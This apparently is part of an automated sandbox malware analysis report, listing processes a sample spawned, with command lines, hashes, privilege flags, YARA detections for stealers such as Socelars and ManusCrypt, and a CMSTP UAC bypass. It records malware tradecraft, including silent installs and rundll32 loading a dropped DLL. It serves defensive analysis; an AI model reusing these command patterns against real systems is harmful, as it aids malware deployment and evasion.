                                                                                                                                                                                                                                    MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                                    Target ID:15
                                                                                                                                                                                                                                    Start time:07:09:29
                                                                                                                                                                                                                                    Start date:04/10/2022
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:ping -n 5 localhost
                                                                                                                                                                                                                                    Imagebase:0xca0000
                                                                                                                                                                                                                                    File size:18944 bytes
                                                                                                                                                                                                                                    MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                                    Target ID:16
                                                                                                                                                                                                                                    Start time:07:09:35
                                                                                                                                                                                                                                    Start date:04/10/2022
                                                                                                                                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                    Imagebase:0x7ff7d6e40000
                                                                                                                                                                                                                                    File size:71680 bytes
                                                                                                                                                                                                                                    MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                                    Target ID:19
                                                                                                                                                                                                                                    Start time:07:09:57
                                                                                                                                                                                                                                    Start date:04/10/2022
                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif
                                                                                                                                                                                                                                    Imagebase:0xe60000
                                                                                                                                                                                                                                    File size:946776 bytes
                                                                                                                                                                                                                                    MD5 hash:6987E4CD3F256462F422326A7EF115B9
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                                    Target ID:20
                                                                                                                                                                                                                                    Start time:07:09:58
                                                                                                                                                                                                                                    Start date:04/10/2022
                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif
                                                                                                                                                                                                                                    Imagebase:0xe60000
                                                                                                                                                                                                                                    File size:946776 bytes
                                                                                                                                                                                                                                    MD5 hash:6987E4CD3F256462F422326A7EF115B9
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                    • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000014.00000002.47264959654.0000000002720000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Socelars, Description: Yara detected Socelars, Source: 00000014.00000003.42825061019.0000000003E36000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Socelars, Description: Yara detected Socelars, Source: 00000014.00000003.42818866608.0000000003E3F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                                                                                                                                    Target ID:21
                                                                                                                                                                                                                                    Start time:07:10:11
                                                                                                                                                                                                                                    Start date:04/10/2022
                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\qymasQHsquYhjAFGoa\FagLhQ
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\qymasQHsquYhjAFGoa\FagLhQ -/SP- /VERYSILENT /SUPPRESSMSGBOXES /pid=767
                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                    File size:12722472 bytes
                                                                                                                                                                                                                                    MD5 hash:19B20FC498D366730C470BACAB083FE7
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:Borland Delphi
                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                    • Detection: 31%, ReversingLabs
                                                                                                                                                                                                                                    • Detection: 3%, Metadefender, Browse

                                                                                                                                                                                                                                    Target ID:22
                                                                                                                                                                                                                                    Start time:07:10:13
                                                                                                                                                                                                                                    Start date:04/10/2022
                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp" /SL5="$5040E,11860388,791040,C:\Users\user\AppData\Local\Temp\qymasQHsquYhjAFGoa\FagLhQ" -/SP- /VERYSILENT /SUPPRESSMSGBOXES /pid=767
                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                    File size:3134848 bytes
                                                                                                                                                                                                                                    MD5 hash:64F68F0B5364A0313EF5C2EDE5FEAC47
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:Borland Delphi
                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                    • Detection: 2%, ReversingLabs

                                                                                                                                                                                                                                    Target ID:23
                                                                                                                                                                                                                                    Start time:07:10:15
                                                                                                                                                                                                                                    Start date:04/10/2022
                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\ZMozrHwlcUivWMjcwg\WyFBnl
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\ZMozrHwlcUivWMjcwg\WyFBnl
                                                                                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                                                                                    File size:3632640 bytes
                                                                                                                                                                                                                                    MD5 hash:2F8CBF74871165688C040E0C95DCE0F0
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                    • Detection: 46%, ReversingLabs

                                                                                                                                                                                                                                    Target ID:24
                                                                                                                                                                                                                                    Start time:07:10:17
                                                                                                                                                                                                                                    Start date:04/10/2022
                                                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                                                    Imagebase:0x7ff6e5440000
                                                                                                                                                                                                                                    File size:57360 bytes
                                                                                                                                                                                                                                    MD5 hash:F586835082F632DC8D9404D83BC16316
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                                    Target ID:25
                                                                                                                                                                                                                                    Start time:07:10:17
                                                                                                                                                                                                                                    Start date:04/10/2022
                                                                                                                                                                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\WerFault.exe -pss -s 480 -p 7960 -ip 7960
                                                                                                                                                                                                                                    Imagebase:0x7ff607a40000
                                                                                                                                                                                                                                    File size:568632 bytes
                                                                                                                                                                                                                                    MD5 hash:5C06542FED8EE68994D43938E7326D75
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                                    Target ID:26
                                                                                                                                                                                                                                    Start time:07:10:19
                                                                                                                                                                                                                                    Start date:04/10/2022
                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\zamzGuUAZjRRZhjPeC\MpVMRr
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\zamzGuUAZjRRZhjPeC\MpVMRr
                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                    File size:77824 bytes
                                                                                                                                                                                                                                    MD5 hash:1725996A931F0F5164CB69E713608F1F
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                    • Detection: 85%, ReversingLabs
                                                                                                                                                                                                                                    • Detection: 33%, Metadefender, Browse

                                                                                                                                                                                                                                    Target ID:27
                                                                                                                                                                                                                                    Start time:07:10:19
                                                                                                                                                                                                                                    Start date:04/10/2022
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff6054b0000
                                                                                                                                                                                                                                    File size:875008 bytes
                                                                                                                                                                                                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                                    Target ID:28
                                                                                                                                                                                                                                    Start time:07:10:19
                                                                                                                                                                                                                                    Start date:04/10/2022
                                                                                                                                                                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 7960 -s 272
                                                                                                                                                                                                                                    Imagebase:0x7ff607a40000
                                                                                                                                                                                                                                    File size:568632 bytes
                                                                                                                                                                                                                                    MD5 hash:5C06542FED8EE68994D43938E7326D75
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                                    Target ID:29
                                                                                                                                                                                                                                    Start time:07:10:20
                                                                                                                                                                                                                                    Start date:04/10/2022
                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\PxuBIvVomAwNlxRyem\EfRhfn
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\PxuBIvVomAwNlxRyem\EfRhfn
                                                                                                                                                                                                                                    Imagebase:0x3c0000
                                                                                                                                                                                                                                    File size:1107968 bytes
                                                                                                                                                                                                                                    MD5 hash:78C42D6817AF1AD96CABDF6FF2F7F3DA
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                    • Detection: 96%, ReversingLabs

                                                                                                                                                                                                                                    Target ID:30
                                                                                                                                                                                                                                    Start time:07:10:20
                                                                                                                                                                                                                                    Start date:04/10/2022
                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\is-A3Q0E.tmp\vc_redist.x64.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\is-A3Q0E.tmp\vc_redist.x64.exe" /install /quiet /norestart
                                                                                                                                                                                                                                    Imagebase:0xe30000
                                                                                                                                                                                                                                    File size:25234792 bytes
                                                                                                                                                                                                                                    MD5 hash:CDCE5D5EE259D8071FA82F522C5C7D6E
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                                    Target ID:31
                                                                                                                                                                                                                                    Start time:07:10:21
                                                                                                                                                                                                                                    Start date:04/10/2022
                                                                                                                                                                                                                                    Path:C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exe" -burn.clean.room="C:\Users\user\AppData\Local\Temp\is-A3Q0E.tmp\vc_redist.x64.exe" -burn.filehandle.attached=636 -burn.filehandle.self=644 /install /quiet /norestart
                                                                                                                                                                                                                                    Imagebase:0x840000
                                                                                                                                                                                                                                    File size:650568 bytes
                                                                                                                                                                                                                                    MD5 hash:D940EA062ED6E99F6D873C2F5F09D1C9
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                    • Detection: 0%, ReversingLabs

                                                                                                                                                                                                                                    Target ID:32
                                                                                                                                                                                                                                    Start time:07:10:23
                                                                                                                                                                                                                                    Start date:04/10/2022
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 2776 -ip 2776
                                                                                                                                                                                                                                    Imagebase:0x500000
                                                                                                                                                                                                                                    File size:482640 bytes
                                                                                                                                                                                                                                    MD5 hash:40A149513D721F096DDF50C04DA2F01F
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                                    Target ID:33
                                                                                                                                                                                                                                    Start time:07:10:23
                                                                                                                                                                                                                                    Start date:04/10/2022
                                                                                                                                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:rundll32.exe "C:\Users\user\AppData\Local\Temp\db.dll",open
                                                                                                                                                                                                                                    Imagebase:0x7ff7d6e40000
                                                                                                                                                                                                                                    File size:71680 bytes
                                                                                                                                                                                                                                    MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                                                                                                    Target ID:34
                                                                                                                                                                                                                                    Start time:07:10:23
                                                                                                                                                                                                                                    Start date:04/10/2022
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:rundll32.exe "C:\Users\user\AppData\Local\Temp\db.dll",open
                                                                                                                                                                                                                                    Imagebase:0x4c0000
                                                                                                                                                                                                                                    File size:61440 bytes
                                                                                                                                                                                                                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                    • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000022.00000002.42906398248.0000000003484000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                                                    • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000022.00000002.42906398248.0000000003484000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000022.00000002.42906398248.0000000003484000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                    • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000022.00000002.42904144469.00000000033A0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                                                    • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000022.00000002.42904144469.00000000033A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: MALWARE_Win_Fabookie, Description: Detects Fabookie / ElysiumStealer, Source: 00000022.00000002.42904144469.00000000033A0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                    • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000022.00000002.42904144469.00000000033A0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown

                                                                                                                                                                                                                                    Target ID:35
                                                                                                                                                                                                                                    Start time:07:10:23
                                                                                                                                                                                                                                    Start date:04/10/2022
                                                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                                                                                                                                                    Imagebase:0x7ff6e5440000
                                                                                                                                                                                                                                    File size:57360 bytes
                                                                                                                                                                                                                                    MD5 hash:F586835082F632DC8D9404D83BC16316
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                    • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000023.00000003.42828619711.000002546F000000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                                                    • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000023.00000003.42828619711.000002546F000000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000023.00000003.42828619711.000002546F000000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                    • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000023.00000002.47258097025.000002546F070000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                                                    • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000023.00000002.47258097025.000002546F070000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000023.00000002.47258097025.000002546F070000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                    • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000023.00000002.47258097025.000002546F070000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                    • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000023.00000000.42836378036.000002546F070000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                                                    • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000023.00000000.42836378036.000002546F070000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000023.00000000.42836378036.000002546F070000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                    • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000023.00000000.42836378036.000002546F070000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                                                                                                                                                                                                    Target ID:36
                                                                                                                                                                                                                                    Start time:07:10:25
                                                                                                                                                                                                                                    Start date:04/10/2022
                                                                                                                                                                                                                                    Path:C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.be\VC_redist.x64.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.be\VC_redist.x64.exe" -q -burn.elevated BurnPipe.{F7864B24-BD58-4321-8DAF-90AD3F7AED80} {2D0A5E22-0BB0-4C91-8FDC-D5C3E4413F94} 8120
                                                                                                                                                                                                                                    Imagebase:0x9f0000
                                                                                                                                                                                                                                    File size:650568 bytes
                                                                                                                                                                                                                                    MD5 hash:D940EA062ED6E99F6D873C2F5F09D1C9
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                    • Detection: 0%, ReversingLabs

                                                                                                                                                                                                                                    Target ID:37
                                                                                                                                                                                                                                    Start time:07:10:25
                                                                                                                                                                                                                                    Start date:04/10/2022
                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\BmJXgWaKpkcZyvlBVT\DMLnyt
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\BmJXgWaKpkcZyvlBVT\DMLnyt
                                                                                                                                                                                                                                    Imagebase:0xdc0000
                                                                                                                                                                                                                                    File size:1503744 bytes
                                                                                                                                                                                                                                    MD5 hash:E3C664A4A00BCBD6BD73D48169421458
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000025.00000000.42841967516.0000000000F09000.00000008.00000001.01000000.00000018.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Socelars, Description: Yara detected Socelars, Source: 00000025.00000000.42883902273.0000000000EDC000.00000002.00000001.01000000.00000018.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Socelars, Description: Yara detected Socelars, Source: 00000025.00000000.42853008071.0000000000EDC000.00000002.00000001.01000000.00000018.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000025.00000000.42853416097.0000000000F09000.00000008.00000001.01000000.00000018.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Socelars, Description: Yara detected Socelars, Source: 00000025.00000000.42891674911.0000000000EDC000.00000002.00000001.01000000.00000018.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000025.00000000.42849786180.0000000000F09000.00000008.00000001.01000000.00000018.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Socelars, Description: Yara detected Socelars, Source: 00000025.00000000.42849307207.0000000000EDC000.00000002.00000001.01000000.00000018.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Socelars, Description: Yara detected Socelars, Source: 00000025.00000002.42914885641.0000000000EDC000.00000002.00000001.01000000.00000018.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Socelars, Description: Yara detected Socelars, Source: 00000025.00000000.42845405706.0000000000EDC000.00000002.00000001.01000000.00000018.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000025.00000000.42892250297.0000000000F09000.00000004.00000001.01000000.00000018.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000025.00000002.42915184542.0000000000F09000.00000004.00000001.01000000.00000018.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000025.00000000.42884223842.0000000000F09000.00000004.00000001.01000000.00000018.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000025.00000000.42845813471.0000000000F09000.00000008.00000001.01000000.00000018.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Socelars, Description: Yara detected Socelars, Source: 00000025.00000000.42841451555.0000000000EDC000.00000002.00000001.01000000.00000018.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Local\Temp\BmJXgWaKpkcZyvlBVT\DMLnyt, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Socelars, Description: Yara detected Socelars, Source: C:\Users\user\AppData\Local\Temp\BmJXgWaKpkcZyvlBVT\DMLnyt, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Local\Temp\BmJXgWaKpkcZyvlBVT\DMLnyt, Author: ditekSHen
                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                    • Detection: 73%, ReversingLabs

                                                                                                                                                                                                                                    Target ID:38
                                                                                                                                                                                                                                    Start time:07:10:25
                                                                                                                                                                                                                                    Start date:04/10/2022
                                                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k WspService
                                                                                                                                                                                                                                    Imagebase:0x7ff6e5440000
                                                                                                                                                                                                                                    File size:57360 bytes
                                                                                                                                                                                                                                    MD5 hash:F586835082F632DC8D9404D83BC16316
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                    • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000026.00000003.42895486469.000001980989B000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                                                    • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000026.00000002.47260101856.000001980984E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                                                    • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000026.00000003.43145351405.000001980989B000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                                                    • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious single byte XORed keyword \'Mozilla/5.0\' - it uses yara\'s XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., Source: 00000026.00000002.47279054659.000001980C240000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                                                    • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000026.00000002.47279054659.000001980C240000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
